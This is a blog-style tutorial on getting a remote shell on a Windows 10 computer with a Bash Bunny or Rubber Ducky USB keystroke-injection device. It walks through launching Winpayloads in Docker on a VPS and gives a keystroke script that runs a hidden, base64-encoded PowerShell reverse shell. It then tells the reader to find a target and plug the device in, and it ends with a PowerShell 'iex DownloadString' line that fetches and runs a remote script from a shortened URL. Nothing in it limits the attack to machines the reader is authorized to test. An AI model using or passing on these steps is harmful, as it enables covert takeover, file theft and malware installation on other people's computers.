🐇 Hacking a Windows 10 Computer with the Bash Bunny or Rubber Ducky 🐤
This guide will show you the simplest way to get a remote shell connection on a Windows 10 target just by plugging in the Bash Bunny. This connection will give you command line control over the computer from a remote location, which I’d constitute as a “hacking” a Windows computer.
This works equally as well, and probably better with a Rubber ducky (because it works faster) but I don’t own a Rubber Ducky, the Bash Bunny is just what I had on hand. Though most of the guide should work the same if you’re using a Rubber Ducky since they both simulate a keyboard.
What you’ll need:
Number 3 is a lie. We’ll be using Winpayloads to generate Powershell payloads and control our shell, all from one program. It’s a script kiddies dream! It takes just two commands to start running Winpayloads once you have a Virtual Private Server set up.
Undetectable Windows Payload Generation with extras Running on Python2.7 Normal installation is deprecated, Please use…
You could use any computer you own, but using a VPS service simplifies things. I recommend using DigitalOcean but any VPS service that can launch a Linux instance will work. There are plenty of guides out there on how to use Digital Ocean. Debian or Ubuntu will work great. Using my referral link like the one bellow will help support the upkeep of my own servers!
DigitalOcean - The developer cloud
Helping millions of developers easily build, test, manage, and scale applications of any size - faster than ever…
Then of course you need the hardware. Here’s a link to Hak5:
Top Pentest Devices
HAK5: EQUIPPING INFOSEC PROS Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our…
Command and Control
SSH into your Linux VPS and run these two commands(make sure to update, upgrade and install Docker first):
docker pull charliedean07/winpayloads:latest
docker run -e LANG=C.UTF-8 --net=host -it charliedean07/winpayloads
Then you should have Winpayloads launched and you’ll see this:
stager then type
r to select a reverse shell payload:
That Powershell string will be the heart of your Bash Bunny / Rubber Ducky payload. Plug in your device and navigate to where the payloads are to be placed, and put in the following code:
Q GUI r
Q DELAY 500
Q STRING powershell
Q DELAY 250
Q DELAY 2000
Q STRING powershell.exe -w hidden -noni -enc [YOUR PAYLOAD HERE]
Q DELAY 500
Your payload will be different each time you generate it with Winpayloads. After the
-noni -enc part is where the base64 string starts that contains your reverse shell payload. Copy the base64 part and paste it over where it says
[YOUR PAYLOAD HERE] like so:
Save the file and dismount your device, it’s now ready for attack.
Locate your Windows 10 target.
Plug in your device.
The payload will take ~10 seconds to initiate if you’re using a Bash Bunny.
You should receive a connection back on your command and control server from whatever IP address your victim is connecting to the internet from.
1 to begin controlling the Windows computer.
You can run any commands on your target, read files, launch more malware, or do some harmless fun like rick roll them with this command (don’t run strange scripts on computers or networks you care about):
iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")